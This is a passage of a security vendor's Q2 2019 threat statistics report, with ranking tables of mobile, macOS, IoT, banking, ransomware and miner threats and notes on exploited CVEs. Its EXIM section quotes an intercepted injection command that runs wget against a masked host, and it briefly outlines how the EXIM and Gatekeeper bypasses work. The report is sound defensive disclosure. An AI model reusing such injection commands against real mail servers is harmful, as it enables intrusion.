Trojans.\n\nTenth and eleventh places went to members of the Asacub family of financial cyberthreats: Trojan-Banker.AndroidOS.Asacub.a (1.93%) and Trojan-Banker.AndroidOS.Asacub.snt (1.92%). Like the Hqwar droppers, this family lost a lot of ground in Q2 2019.\n\n### Geography of mobile threats\n\n_Geography of mobile malware infection attempts, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153325/it-threat-evolution-q2-2019-statistics-5.png>)\n\n#### Top 10 countries by share of users attacked by mobile malware\n\n| Country* | %** \n---|---|--- \n1 | Iran | 28.31 \n2 | Bangladesh | 28.10 \n3 | Algeria | 24.77 \n4 | Pakistan | 24.00 \n5 | Tanzania | 23.07 \n6 | Nigeria | 22.69 \n7 | India | 21.65 \n8 | Indonesia | 18.13 \n9 | Sri Lanka | 15.96 \n10 | Kenya | 15.38 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000)._ \n_** Unique users attacked by mobile bankers as a percentage of all users of Kaspersky mobile solutions in the country._\n\nAt the head of Q2's Top 10 countries by share of attacked users is Iran (28.31%), which took second place in this rating in Q1 2019. Iran displaced Pakistan (24%), which now occupies fourth position.\n\nMost often, users of Kaspersky security solutions in Iran encountered the Trojan.AndroidOS.Hiddapp.bn adware Trojan (21.08%) as well as the potentially unwanted apps RiskTool.AndroidOS.FakGram.a (12.50%), which seeks to intercept messages in Telegram, and RiskTool.AndroidOS.Dnotua.yfe (12.29%).\n\nLike Iran, Bangladesh (28.10%) rose one position in our Top 10. Most often, users in Bangladesh came across various adware aps, including AdWare.AndroidOS.Agent.f (35.68%), AdWare.AndroidOS.HiddenAd.et (14.88%), and AdWare.AndroidOS.Ewind.h (9.65%).\n\nThird place went to Algeria (24.77%), where users of Kaspersky mobile solutions most often ran into the AdWare.AndroidOS.HiddenAd.et (27.15%), AdWare.AndroidOS.Agent.f (14.16%), and AdWare.AndroidOS.Oimobi.a (8.04%) adware apps.\n\n### Mobile banking Trojans\n\nIn the reporting period, we detected **13,899** installation packages for mobile banking Trojans, down to nearly half the number recorded in Q1 2019.\n\nThe largest contribution was made by the creators of the Svpeng family of Trojans: 30.79% of all detected banking Trojans. Trojan-Banker.AndroidOS.Wroba (17.16%) and Trojan-Banker.AndroidOS.Agent (15.70%) came second and third, respectively. The much-hyped Asacub Trojan (11.98%) managed only fifth.\n\n_Number of installation packages for mobile banking Trojans detected by Kaspersky, Q3 2018 \u2013 Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153349/it-threat-evolution-q2-2019-statistics-6.png>)\n\n**Top 10 mobile banking Trojans**\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Banker.AndroidOS.Asacub.a | 13.64 \n2 | Trojan-Banker.AndroidOS.Asacub.snt | 13.61 \n3 | Trojan-Banker.AndroidOS.Svpeng.ak | 13.51 \n4 | Trojan-Banker.AndroidOS.Svpeng.q | 9.90 \n5 | Trojan-Banker.AndroidOS.Agent.ep | 9.37 \n6 | Trojan-Banker.AndroidOS.Asacub.ce | 7.75 \n7 | Trojan-Banker.AndroidOS.Faketoken.q | 4.18 \n8 | Trojan-Banker.AndroidOS.Asacub.cs | 4.18 \n9 | Trojan-Banker.AndroidOS.Agent.eq | 3.81 \n10 | Trojan-Banker.AndroidOS.Faketoken.z | 3.13 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile antivirus that were attacked by banking threats._\n\nAlmost half our Top 10 mobile bankers in Q2 2019 is made up of modifications of the Trojan-Banker.AndroidOS.Asacub Trojan: four positions out of ten. However, this family's distribution bursts that we registered last quarter were not repeated this time.\n\nAs in Q1, Trojan-Banker.AndroidOS.Agent.eq and Trojan-Banker.AndroidOS.Agent.ep made it into the Top 10; however, they ceded the highest positions to the Svpeng family of Trojans, which is considered one of the longest in existence.\n\n_Geography of mobile banking threats, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153417/it-threat-evolution-q2-2019-statistics-7.png>)\n\n#### Top 10 countries by share of users attacked by mobile banking Trojans:\n\n| Country* | %** \n---|---|--- \n1 | South Africa | 0.64% \n2 | Russia | 0.31% \n3 | Tajikistan | 0.21% \n4 | Australia | 0.17% \n5 | Turkey | 0.17% \n6 | Ukraine | 0.13% \n7 | Uzbekistan | 0.11% \n8 | Korea | 0.11% \n9 | Armenia | 0.10% \n10 | India | 0.10% \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000)._ \n_** Unique users attacked by mobile banking Trojans as a percentage of all users of Kaspersky mobile solutions in the country._\n\nIn Q2 2019, South Africa (0.64%) climbed to first place, up from fourth in the previous quarter. In 97% of cases, users in that country encountered Trojan-Banker.AndroidOS.Agent.dx.\n\nSecond place was claimed by Russia (0.31%), where our solutions most often detected members of the Asacub and Svpeng families: Trojan-Banker.AndroidOS.Asacub.a (14.03%), Trojan-Banker.AndroidOS.Asacub.snt (13.96%), and Trojan-Banker.AndroidOS.Svpeng.ak (13.95%).\n\nThird place belongs to Tajikistan (0.21%), where Trojan-Banker.AndroidOS.Faketoken.z (35.96%), Trojan-Banker.AndroidOS.Asacub.a (12.92%), and Trojan- Banker.AndroidOS.Grapereh.j (11.80%) were most frequently met.\n\n### Mobile ransomware Trojans\n\nIn Q2 2019, we detected **23,294** installation packages for mobile Trojan ransomware, which is 4,634 fewer than last quarter.\n\n_Number of installation packages for mobile banking Trojans, Q3 2018 \u2013 Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153440/it-threat-evolution-q2-2019-statistics-8.png>)\n\n#### Top 10 mobile ransomware Trojans\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Ransom.AndroidOS.Svpeng.aj | 43.90 \n2 | Trojan-Ransom.AndroidOS.Rkor.i | 11.26 \n3 | Trojan-Ransom.AndroidOS.Rkor.h | 7.81 \n4 | Trojan-Ransom.AndroidOS.Small.as | 6.41 \n5 | Trojan-Ransom.AndroidOS.Svpeng.ah | 5.92 \n6 | Trojan-Ransom.AndroidOS.Svpeng.ai | 3.35 \n7 | Trojan-Ransom.AndroidOS.Fusob.h | 2.48 \n8 | Trojan-Ransom.AndroidOS.Small.o | 2.46 \n9 | Trojan-Ransom.AndroidOS.Pigetrl.a | 2.45 \n10 | Trojan-Ransom.AndroidOS.Small.ce | 2.22 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile solutions that were attacked by ransomware Trojans._\n\nIn Q2 2019, the most widespread family of ransomware Trojans was Svpeng: three positions in the Top 10.\n\n_Geography of mobile ransomware Trojans, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153507/it-threat-evolution-q2-2019-statistics-9.png>)\n\n#### Top 10 countries by share of users attacked by mobile ransomware Trojans:\n\n| Country* | %** \n---|---|--- \n1 | US | 1.58 \n2 | Kazakhstan | 0.39 \n3 | Iran | 0.27 \n4 | Pakistan | 0.16 \n5 | Saudi Arabia | 0.10 \n6 | Mexico | 0.09 \n7 | Canada | 0.07 \n8 | Italy | 0.07 \n9 | Singapore | 0.05 \n10 | Indonesia | 0.05 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000)_ \n_** Unique users attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky mobile solutions in the country._\n\nThe leaders by number of users attacked by mobile ransomware Trojans, as in the previous quarter, were the US (1.58%), Kazakhstan (0.39%), and Iran (0.27%)\n\n## Attacks on Apple macOS\n\nQ2 witnessed several interesting events, three of which deserve special attention.\n\nA [vulnerability](<https://www.fcvl.net/vulnerabilities/macosx-gatekeeper-bypass>) was discovered in the macOS operating system allowing Gatekeeper and XProtect scans to be bypassed. Exploitation requires creating an archive with a symbolic link to the shared NFS folder containing the file. When the archive is opened, the file from the shared NFS folder is automatically downloaded by the system without any checks. The first malware exploiting this vulnerability was not long in coming; however, all the detected specimens were more likely test versions than actual malware.\n\nVulnerabilities detected in the Firefox browser ([CVE-2019-11707](<https://www.mozilla.org/en-US/security/advisories/mfsa2019-18/>), [CVE-2019-11708](<https://www.mozilla.org/en-US/security/advisories/mfsa2019-19/>)) allowed arbitrary code to be executed with a view to sandbox escape. After this information was made public, the first exploitations occurred. Using these vulnerabilities, cybercriminals dropped spyware Trojans from the Mokes and Wirenet families onto victim computers.\n\nAlso an interesting vector for delivering a malicious miner to victims was [discovered](<https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/>). The attackers used social engineering and legitimate apps modified with malicious code. But even more interestingly, the malicious part consisted of a QEMU emulator and a Linux virtual machine, housing the miner. As soon as QEMU was launched on the infected machine, the miner started up inside its image. The scheme is so outlandish \u2013 both QEMU and the miner consume significant resources \u2013 that such a Trojan could not remain unnoticed for long.\n\n### Top 20 threats for macOS\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Downloader.OSX.Shlayer.a | 24.61 \n2 | AdWare.OSX.Spc.a | 12.75 \n3 | AdWare.OSX.Bnodlero.t | 11.98 \n4 | AdWare.OSX.Pirrit.j | 11.27 \n5 | AdWare.OSX.Pirrit.p | 8.42 \n6 | AdWare.OSX.Pirrit.s | 7.76 \n7 | AdWare.OSX.Pirrit.o | 7.59 \n8 | AdWare.OSX.MacSearch.a | 5.92 \n9 | AdWare.OSX.Cimpli.d | 5.76 \n10 | AdWare.OSX.Mcp.a | 5.39 \n11 | AdWare.OSX.Agent.b | 5.11 \n12 | AdWare.OSX.Pirrit.q | 4.31 \n13 | AdWare.OSX.Bnodlero.v | 4.02 \n14 | AdWare.OSX.Bnodlero.q | 3.70 \n15 | AdWare.OSX.MacSearch.d | 3.66 \n16 | Downloader.OSX.InstallCore.ab | 3.58 \n17 | AdWare.OSX.Geonei.as | 3.48 \n18 | AdWare.OSX.Amc.a | 3.29 \n19 | AdWare.OSX.Agent.c | 2.93 \n20 | AdWare.OSX.Mhp.a | 2.90 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky security solutions for macOS that were attacked._\n\nOn the topic of most common threats in Q2, the Shlayer.a Trojan (24.61%) retained top spot. In second place is the adware app AdWare.OSX.Spc.a (12.75%) and in third AdWare.OSX.Bnodlero.t (11.98%), which pushed AdWare.OSX.Pirrit.j (11.27%) into fourth. Like last quarter, most of the Top 20 places went to adware apps. Among them, members of the Pirrit family were particularly prominent: five positions out of 20.\n\n### Threat geography\n\n| Country* | %** \n---|---|--- \n1 | France | 11.11 \n2 | Spain | 9.68 \n3 | India | 8.84 \n4 | US | 8.49 \n5 | Canada | 8.35 \n6 | Russia | 8.01 \n7 | Italy | 7.74 \n8 | UK | 7.47 \n9 | Mexico | 7.08 \n10 | Brazil | 6.85 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000)_ \n_** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nIn terms of the geographical spread of macOS threats, France (11.11%), Spain (9.68%), and India (8.84%) retained their leadership.\n\nIn the US (8.49%), Canada (8.35%), and Russia (8.01%), the share of infected users increased, ranking these countries respectively fourth, fifth, and sixth in our Top 10.\n\n## IoT attacks\n\n### Interesting events\n\nIn the world of Linux/Unix threats, the most significant event was the active rise in the number of attacks exploiting a new [vulnerability](<https://www.exim.org/static/doc/security/CVE-2019-10149.txt>) in the EXIM mail transfer agent. In a nutshell, the attacker creates a special email and fills the recipient field with code to be executed on the vulnerable target mail server. The message is then sent using this server. EXIM processes the sent message and executes the code in the recipient field.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153528/it-threat-evolution-q2-2019-statistics-10.png>)\n\n_Intercepted attack traffic_\n\nThe screenshot shows a message whose RCPT field contains the shell script. The latter actually looks as follows: \n \n \n /bin/bash -c \"wget X.X.X.X/exm -O /dev/null\n\n### IoT threat statistics\n\nQ2 2019 demonstrated a significant drop in attacks via telnet: around 60% versus 80% in Q1. The assumption is that cybercriminals are gradually switching to more productive hardware enabling the use of SSH. \n \nSSH | 40.43% \nTelnet | 59.57% \n \n_Distribution of attacked services by number of unique IP addresses of attacking devices, Q2 2019_\n\nHowever, in terms of number of sessions involving Kaspersky Lab [honeypots](<https://encyclopedia.kaspersky.com/glossary/honeypot-glossary/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), we see a decline for SSH from 64% in Q1 to 49.6% in Q2. \n \nSSH | 49.59% \nTelnet | 50.41% \n \n_Distribution of cybercriminals' working sessions with Kaspersky Lab traps, Q2 2019_\n\n### Telnet-based attacks\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab telnet traps, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153555/it-threat-evolution-q2-2019-statistics-11.png>)\n\n#### **Top 10 countries by location of devices from which telnet-based attacks were carried out on Kaspersky Lab traps**\n\n| Country | % \n---|---|--- \n1 | Egypt | 15.06 \n2 | China | 12.27 \n3 | Brazil | 10.24 \n4 | US | 5.23 \n5 | Russia | 5.03 \n6 | Greece | 4.54 \n7 | Iran | 4.06 \n8 | Taiwan | 3.15 \n9 | India | 3.04 \n10 | Turkey | 2.90 \n \nFor the second quarter in a row, Egypt (15.06%) topped the leaderboard by number of unique IP addresses from which attempts were made to attack Kaspersky Lab traps. Second place, by a small margin, went to China (12.27%), with Brazil (10.24%) in third.\n\nTelnet-based attacks most often used a member of the infamous Mirai malware family as ammunition.\n\n#### **Top 10 malware downloaded to infected IoT devices via successful telnet-based attacks **\n\n| Verdict | %* \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 38.92 \n2 | Trojan-Downloader.Linux.NyaDrop.b | 26.48 \n3 | Backdoor.Linux.Mirai.ba | 26.48 \n4 | Backdoor.Linux.Mirai.au | 15.75 \n5 | Backdoor.Linux.Gafgyt.bj | 2.70 \n6 | Backdoor.Linux.Mirai.ad | 2.57 \n7 | Backdoor.Linux.Gafgyt.az | 2.45 \n8 | Backdoor.Linux.Mirai.h | 1.38 \n9 | Backdoor.Linux.Mirai.c | 1.36 \n10 | Backdoor.Linux.Gafgyt.av | 1.26 \n \n_* Share of malware type in the total amount of malware downloaded to IoT devices via successful telnet attacks_\n\nAs things stand, there is no reason to expect a change in the situation with Mirai, which remains the most popular malware family with cybercriminals attacking IoT devices.\n\n### SSH-based attacks\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab SSH traps, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153622/it-threat-evolution-q2-2019-statistics-12.png>)\n\n#### **Top 10 countries by location of devices from which attacks were made on Kaspersky Lab SSH traps**\n\n| Country | % \n---|---|--- \n1 | Vietnam | 15.85 \n2 | China | 14.51 \n3 | Egypt | 12.17 \n4 | Brazil | 6.91 \n5 | Russia | 6.66 \n6 | US | 5.05 \n7 | Thailand | 3.76 \n8 | Azerbaijan | 3.62 \n9 | India | 2.43 \n10 | France | 2.12 \n \nIn Q2 2019, the Top 3 countries by number of devices attacking Kaspersky Lab traps using the SSH protocol were Vietnam (15.85%), China (14.51%), and Egypt (12.17%). The US (5.05%), which took second place in Q1 2019, dropped down to seventh.\n\n## Financial threats\n\n### Financial threat statistics\n\nIn Q2 2019, Kaspersky solutions blocked attempts to launch one or more types of malware designed to steal money from bank accounts on the computers of 228,206 users.\n\n_Number of unique users attacked by financial malware, Q2 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153645/it-threat-evolution-q2-2019-statistics-13.png>)\n\n### Attack geography\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products that faced this threat during the reporting period out of all users of our products in that country.\n\n_Geography of banking malware attacks, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153713/it-threat-evolution-q2-2019-statistics-14.png>)\n\n#### Top 10 countries by share of attacked users\n\n| **Country*** | **%**** \n---|---|--- \n1 | Belarus | 2.0 \n2 | Venezuela | 1.8 \n3 | China | 1.6 \n4 | Indonesia | 1.3 \n5 | South Korea | 1.3 \n6 | Cyprus | 1.2 \n7 | Paraguay | 1.2 \n8 | Russia | 1.2 \n9 | Cameroon | 1.1 \n10 | Serbia | 1.1 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000)._ \n_** Unique users whose computers were targeted by banking Trojans as a percentage of all unique users of Kaspersky products in the country._\n\n#### Top 10 banking malware families\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | RTM | Trojan-Banker.Win32.RTM | 32.2 | \n2 | Zbot | Trojan.Win32.Zbot | 23.3 | \n3 | Emotet | Backdoor.Win32.Emotet | 8.2 | \n4 | Nimnul | Virus.Win32.Nimnul | 6.4 | \n5 | Trickster | Trojan.Win32.Trickster | 5.0 | \n6 | Nymaim | Trojan.Win32.Nymaim | 3.5 | \n7 | SpyEye | Backdoor.Win32.SpyEye | 3.2 | \n8 | Neurevt | Trojan.Win32.Neurevt | 2.8 | \n9 | IcedID | Trojan-Banker.Win32.IcedID | 1.2 | \n10 | Gozi | Trojan.Win32.Gozi | 1.1 | \n \n_** Unique users attacked by this malware as a percentage of all users attacked by financial malware._\n\nIn Q2 2019, the Top 3 remained unchanged compared to the previous quarter. The leading positions in our Top 10, by a clear margin, went to the Trojan-Banker.Win32.RTM (32.2%) and Trojan.Win32.Zbot (23.3%) families. Their shares rose by 4.8 and 0.4 p.p. respectively. Behind them came the Backdoor.Win32.Emotet family (8.2%); its share, conversely, fell by 1.1 p.p. From the beginning of June, we noted a decrease in the activity of Emotet C&amp;C servers, and by early Q3 almost all the C&amp;C botnets were unavailable.\n\nWe also observe that in Q2 Trojan-Banker.Win32.IcedID (1.2%) and Trojan.Win32.Gozi (1.1%) appeared in the Top 10 families. They took ninth and tenth places, respectively.\n\n## Ransomware programs\n\n### Quarterly highlights\n\nAfter almost 18 months of active distribution, the team behind the GandCrab ransomware announced it was [shutting down the operation](<https://threatpost.com/gandcrab-ransomware-shutters/145267/>). According to our reports, it was one of the most common ransomware encryptors.\n\nIn Q2, distribution got underway of the new [Sodin](<https://securelist.com/sodin-ransomware/91473/>) ransomware (aka Sodinokibi or REvil), which was noteworthy for several reasons. There was the distribution method through hacking vulnerable servers, plus the use of a rare LPE exploit, not to mention the complex cryptographic scheme.\n\nAlso this quarter, there were a few high-profile ransomware infections in the computer networks of [city](<https://threatpost.com/ransomware-florida-city-pays-600k-ransom/145869/>) [administrations](<https://threatpost.com/second-florida-city-pays-hackers-500k-post-ransomware-attack/146018/>). This is not a new trend, since hacking corporate or municipal networks for extortion purposes is common enough. However, the mass nature of such incidents in recent years draws attention to the security of critical computer infrastructure, on which not only individual organizations but entire communities rely.\n\n### Number of new modifications\n\nIn Q2 2019, we identified eight new families of ransomware Trojans and detected 16,017 new modifications of these malware types. For comparison, Q1 saw 5,222 new modifications, three times fewer.\n\n_Number of new ransomware modifications, Q2 2018 \u2013 Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153736/it-threat-evolution-q2-2019-statistics-15.png>)\n\nThe majority of new modifications belonged to the Trojan-Ransom.Win32.Gen family (various Trojans are automatically detected as such based on behavioral rules), as well as Trojan-Ransom.Win32.PolyRansom. The large number of PolyRansom modifications was due to the nature of this malware \u2013 it is a worm that creates numerous mutations of its own body. It substitutes these modified copies for user files, and places the victim's data inside them in encrypted form.\n\n### Number of users attacked by ransomware Trojans\n\nIn Q2 2019, Kaspersky products defeated ransomware attacks against 232,292 unique KSN users. This is 50,000+ fewer than the previous quarter.\n\n_Number of unique users attacked by ransomware Trojans, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153800/it-threat-evolution-q2-2019-statistics-16.png>)\n\nThe busiest month for protecting attacked users was April (107,653); this is even higher than the figure for March (106,519), which marks a continuation of the upward trend seen in Q1. However, in May the number of attacked users began to fall, and in June they amounted to a little over 82,000.\n\n### Attack geography\n\n_Geographical spread of countries by share of users attacked by ransomware Trojans, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153826/it-threat-evolution-q2-2019-statistics-17.png>)\n\n#### Top 10 countries attacked by ransomware Trojans\n\n| **Country*** | **% of users attacked by ransomware**** \n---|---|--- \n1 | Bangladesh | 8.81% \n2 | Uzbekistan | 5.52% \n3 | Mozambique | 4.15% \n4 | Ethiopia | 2.42% \n5 | Nepal | 2.26% \n6 | Afghanistan | 1.50% \n7 | China | 1.18% \n8 | Ghana | 1.17% \n9 | Korea | 1.07% \n10 | Kazakhstan | 1.06% \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000)._ \n_** Unique users whose computers were attacked by Trojan encryptors as a percentage of all unique users of Kaspersky products in the country._\n\n### Top 10 most common families of ransomware Trojans\n\n| **Name** | **Verdict*** | **Percentage of attacked users**** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 23.37% | \n2 | (generic verdict) | Trojan-Ransom.Win32.Phny | 18.73% | \n3 | GandCrab | Trojan-Ransom.Win32.GandCrypt | 13.83% | \n4 | (generic verdict) | Trojan-Ransom.Win32.Gen | 7.41% | \n5 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 4.73% | \n6 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 4.15% | \n7 | Shade | Trojan-Ransom.Win32.Shade | 2.75% | \n8 | PolyRansom/VirLock | Virus.Win32.PolyRansom \nTrojan-Ransom.Win32.PolyRansom | 2.45% | \n9 | Crysis/Dharma | Trojan-Ransom.Win32.Crusis | 1.31% | \n10 | Cryakl | Trojan-Ransom.Win32.Cryakl | 1.24% | \n| | | | | \n \n_* Statistics are based on detection verdicts of Kaspersky products. The information was provided by Kaspersky product users who consented to provide statistical data._ \n_** Unique Kaspersky users attacked by a particular family of ransomware Trojans as a percentage of all users attacked by ransomware Trojans._\n\n## Miners\n\n### Number of new modifications\n\nIn Q2 2019, Kaspersky solutions detected 7,156 new modifications of miners, almost 5,000 fewer than in Q1.\n\n_Number of new miner modifications, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153850/it-threat-evolution-q2-2019-statistics-18.png>)\n\nThe largest number of new modifications was detected in April (3,101). This is also nearly 1,000 more than in March 2019, but, on average, new miner modifications are appearing less and less.\n\n### Number of users attacked by miners\n\nIn Q2, we detected attacks using miners on the computers of 749,766 unique users of Kaspersky products worldwide.\n\n_Number of unique users attacked by miners, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153917/it-threat-evolution-q2-2019-statistics-19.png>)\n\nThroughout the quarter, the number of attacked users gradually decreased \u2013 from 383,000 in April to 318,000 in June.\n\n### Attack geography\n\n_Geographical spread of countries by share of users attacked by miners, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153944/it-threat-evolution-q2-2019-statistics-20.png>)\n\n**Top 10 countries by share of users attacked by miners**\n\n| **Country*** | **% of users attacked by miners**** \n---|---|--- \n1 | Afghanistan | 10.77% \n2 | Ethiopia | 8.99% \n3 | Uzbekistan | 6.83% \n4 | Kazakhstan | 4.76% \n5 | Tanzania | 4.66% \n6 | Vietnam | 4.28% \n7 | Mozambique | 3.97% \n8 | Ukraine | 3.08% \n9 | Belarus | 3.06% \n10 | Mongolia | 3.06% \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000)._ \n_** Unique users whose computers were attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by cybercriminals during cyber attacks\n\nOver the past year, the Microsoft Office suite has topped our breakdown of the most attacked applications. Q2 2019 was no exception \u2013 the share of exploits for vulnerabilities in Microsoft Office applications rose from 67% to 72%. The reason for the growth was primarily the incessant mass spam mailings distributing documents with exploits for the [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), [CVE-2018-0798](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0798>), and [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>) vulnerabilities. These vulnerabilities exploit stack overflow due to bugs in object processing to remotely execute code for the Equation Editor component in Microsoft Office. Other Office vulnerabilities such as [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>) and [CVE-2017-8759](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759>) are also popular with cybercriminals.\n\nThe increasing popularity of exploits for Microsoft Office suggests that cybercriminals see it as the easiest and fastest way to deploy malware on victim computers. In other words, these exploits are more likely to succeed, since their format enables the use of various techniques for bypassing static detection tools, and their execution is hidden from users and requires no additional actions, such as running macros.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16154007/it-threat-evolution-q2-2019-statistics-21.png>)\n\nThe share of detected exploits for vulnerabilities in different web browsers in Q2 amounted to 14%, five times less than the share of exploits for Microsoft Office. Most browser vulnerabilities are the result of errors in just-in-time code compilation, as well as during various stages of code optimization, since the logic of these processes is complex and demands special attention from developers. Insufficient checks for potential modification of data or data types during such processing, when it is not expected by the compiler/optimizer, often give rise to new vulnerabilities. Other common errors that can lead to remote code execution in web browsers are data type overflow, freed memory usage, and incorrect use of types. Perhaps the most interesting example this quarter was a zero-day exploit targeted at employees of [Coinbase](<https://www.zdnet.com/article/firefox-zero-day-was-used-in-attack-against-coinbase-employees-not-its-users/>) and a number of other organizations. Found in the wild, it utilized two vulnerabilities at once, [CVE-2019-11707](<https://www.mozilla.org/en-US/security/advisories/mfsa2019-18/>) and [CVE-2019-11708](<https://www.mozilla.org/en-US/security/advisories/mfsa2019-19/>), for remote code execution in Mozilla Firefox.\n\nOn the topic of zero-days, the release in Q2 of exploit code by a security researcher under the pseudonym SandboxEscaper is worth noting. The set of exploits, named PolarBear, elevates privileges under Windows 10 and targets the following vulnerabilities: [CVE-2019-1069](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1069>), [CVE-2019-0863](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0863>), [CVE-2019-0841](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0841>), and [CVE-2019-0973](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0973>).\n\nThe share of network attacks continued to grow in Q2. Cybercriminals did not abandon EternalBlue-based attacks on systems with an unpatched SMB subsystem, and were active in bringing new vulnerabilities on stream in network applications such as [Oracle WebLogic](<https://securelist.com/sodin-ransomware/91473/>). A separate note goes to the ongoing password attacks on Remote Desktop Protocol and Microsoft SQL Server. However, the greatest danger for many users came from the [CVE-2019-0708](<https://blogs.technet.microsoft.com/msrc/2019/05/14/prevent-a-worm-by-updating-remote-desktop-services-cve-2019-0708/>) vulnerability, found in Q2, in the remote desktop subsystem for Windows XP, Windows 7, and Windows Server 2008. It can be used by cybercriminals to gain remote control over vulnerable computers, and create a network worm not unlike the [WannaCry ransomware](<https://securelist.com/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/78351/>). Insufficient scanning of incoming packets allows an attacker to implement a use-after-free script and overwrite data in the kernel memory. Note that exploitation of this attack does not require access to a remote account, as it takes place at the authorization stage before the username and password are checked.\n\n### Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n#### Countries that are sources of web-based attacks: Top 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&amp;C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn Q2 2019, Kaspersky solutions defeated **717,057,912** attacks launched from online resources located in 203 countries across the globe. **217,843,293** unique URLs triggered Web Anti-Virus components.\n\n_Distribution of web-based attack sources by country, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16154032/it-threat-evolution-q2-2019-statistics-22.png>)\n\nThis quarter, Web Anti-Virus was most active on resources located in the US. Overall, the Top 4 remained unchanged from the previous quarter.\n\n#### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious objects that fall under the Malware class; it does not include Web Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Algeria | 20.38 \n2 | Venezuela | 19.13 \n3 | Albania | 18.30 \n4 | Greece | 17.36 \n5 | Moldova | 17.30 \n6 | Bangladesh | 16.82 \n7 | Estonia | 16.68 \n8 | Azerbaijan | 16.59 \n9 | Belarus | 16.46 \n10 | Ukraine | 16.18 \n11 | France | 15.84 \n12 | Philippines | 15.46 \n13 | Armenia | 15.40 \n14 | Tunisia | 15.29 \n15 | Bulgaria | 14.73 \n16 | Poland | 14.69 \n17 | R\u00e9union | 14.68 \n18 | Latvia | 14.65 \n19 | Peru | 14.50 \n20 | Qatar | 14.32 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users 